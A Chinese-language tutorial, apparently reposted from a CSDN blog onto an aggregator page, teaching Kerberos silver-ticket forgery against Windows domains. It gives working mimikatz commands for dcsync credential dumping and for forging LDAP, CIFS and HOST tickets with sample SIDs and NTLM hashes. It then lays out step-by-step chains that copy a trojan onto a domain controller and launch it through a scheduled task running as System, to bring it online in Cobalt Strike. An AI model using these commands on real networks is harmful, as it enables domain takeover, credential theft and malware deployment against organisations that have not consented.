欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 养生 > 白银票据~

白银票据~

2024/10/24 10:27:05 来源:https://blog.csdn.net/Y22Lee/article/details/139448774  浏览:    关键词:白银票据~

一. 白银票据的原理

白银票据就伪造ST票据, kerberoasting是破解ST票据中的服务用户hash值,有以下区别:

白银票据:伪造的ST使用的是机器用户的Hash值
Kerberoasting:破解的是ST的域用户的hash值

二. 白银票据的利用条件

1.域名
2.域sid
3.目标服务器名(域名)
在这里插入图片描述

4.可利用的服务

常见服务可以参考:https://blog.csdn.net/Cashey1991/article/details/6837202

5.目标机器用户的NTLM-HASH
6.需要伪造的用户名
在这里插入图片描述

三. 白银票据机器用户的hash值

1、如果有域中的管理员账号可以使用dcsync读取

lsadump::dcsync /domain:hack.com /all /csv

在这里插入图片描述
2、如果通过枚举出来一个域中的管理员用户,可以使用如下的命令

secretsdump.exe 域名/administrator:密码@IP
如出现编码错误输入 chcp936

在这里插入图片描述

四. 使用白银票据伪造常用服务

白银票据可以伪造的服务非常多,简单列举几个常用的

  1. CIFS
    在windows主机之间进行网络文件共享是通过使用微软公司自己的CIFS服务实现的(IPC)
    在这里插入图片描述

  2. LDAP
    可以实现ldap查询或者执行dcsync
    在这里插入图片描述

  3. HOST
    可以实现计划任务等
    在这里插入图片描述

五. 白银票据的各种制作方式和使用

使用mimikatz可以在线或者是离线(本地制作后上传)制作白银票据

kerberos::golden /domain:域名 /sid:SID /target:目标机器 /service:服务名 /rc4:NTLM-HASH /user:administrator /ptt
/ptt:加上制作后默认直接打入内存中,不会生成文件

在这里插入图片描述
在这里插入图片描述

使用的hash值必须与目标机器用户相对应

六. 域内机器下的白银票据制作和CS上线

控制了一台域内主机电脑现在要控制域控(通过kerberoasting)

第一步:检查电脑是否加入域并查看权限,加入域可以直接使用白银票据
在这里插入图片描述
在这里插入图片描述
第二步:查看域的sid值
在这里插入图片描述
第三步:伪造LDAP服务的白银票据并注入到内存中

kerberos::golden /domain:hack.com /sid:S-1-5-21-3176001243-559812214-128103957 /target:DC /service:LDAP /rc4:2c1cfa157eb8255a8bbbdba997459dc3 /user:administrator /ptt

在这里插入图片描述
第四步:通过dcsync查询域控上的hash值
在这里插入图片描述
第五步:用前面收集制作金票或者PTH,PTK,PTT等认证然后进行横向
在这里插入图片描述
第六步:使用之前的上线办法上线CS

在这里插入图片描述

七. 工作组机器下的白银票据制作和CS上线

在工作组中的机器使用白银票据的时候需要注意如下的问题

工作组机器的DNS必须修改成域控的IP(主要是工作组中的机器需要ping通域名)
如果不修改DNS,可以修改本地的HOST文件,将域名执行对应的IP地址

第一步:检查是否是域用户
在这里插入图片描述

第二步:修改DNS或者HOST文件,如果在ping不同域名的情况下需要修改

netsh interface ipv4 add dns 本地连接 192.168.41.10
echo 192.168.41.10 dc.hack.com >> C:\Windows\System32\drivers\etc\hosts

在这里插入图片描述

第三步:获取制作白银票据的条件,伪造CIFS服务

kerberos::golden /domain:hack.com /sid:S-1-5-21-3176001243-559812214-128103957 /target:DC /service:CIFS /rc4:2c1cfa157eb8255a8bbbdba997459dc3 /user:administrator /ptt

在这里插入图片描述

第四步:将木马copy到目标C盘下

在这里插入图片描述

第五步:伪造host服务

kerberos::golden /domain:hack.com /sid:S-1-5-21-3176001243-559812214-128103957 /target:DC /service:HOST /rc4:2c1cfa157eb8255a8bbbdba997459dc3 /user:administrator /ptt

在这里插入图片描述
第六步:使用计划任务上线CS

schtasks /create /s 192.168.41.10 /tn test /tr C:/1exe  /sc onstart /RU System /F  创建计划任务
schtasks /run /s 192.168.41.10  /u administrator /p Admin123 /i /tn "test"   运行计划任务

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com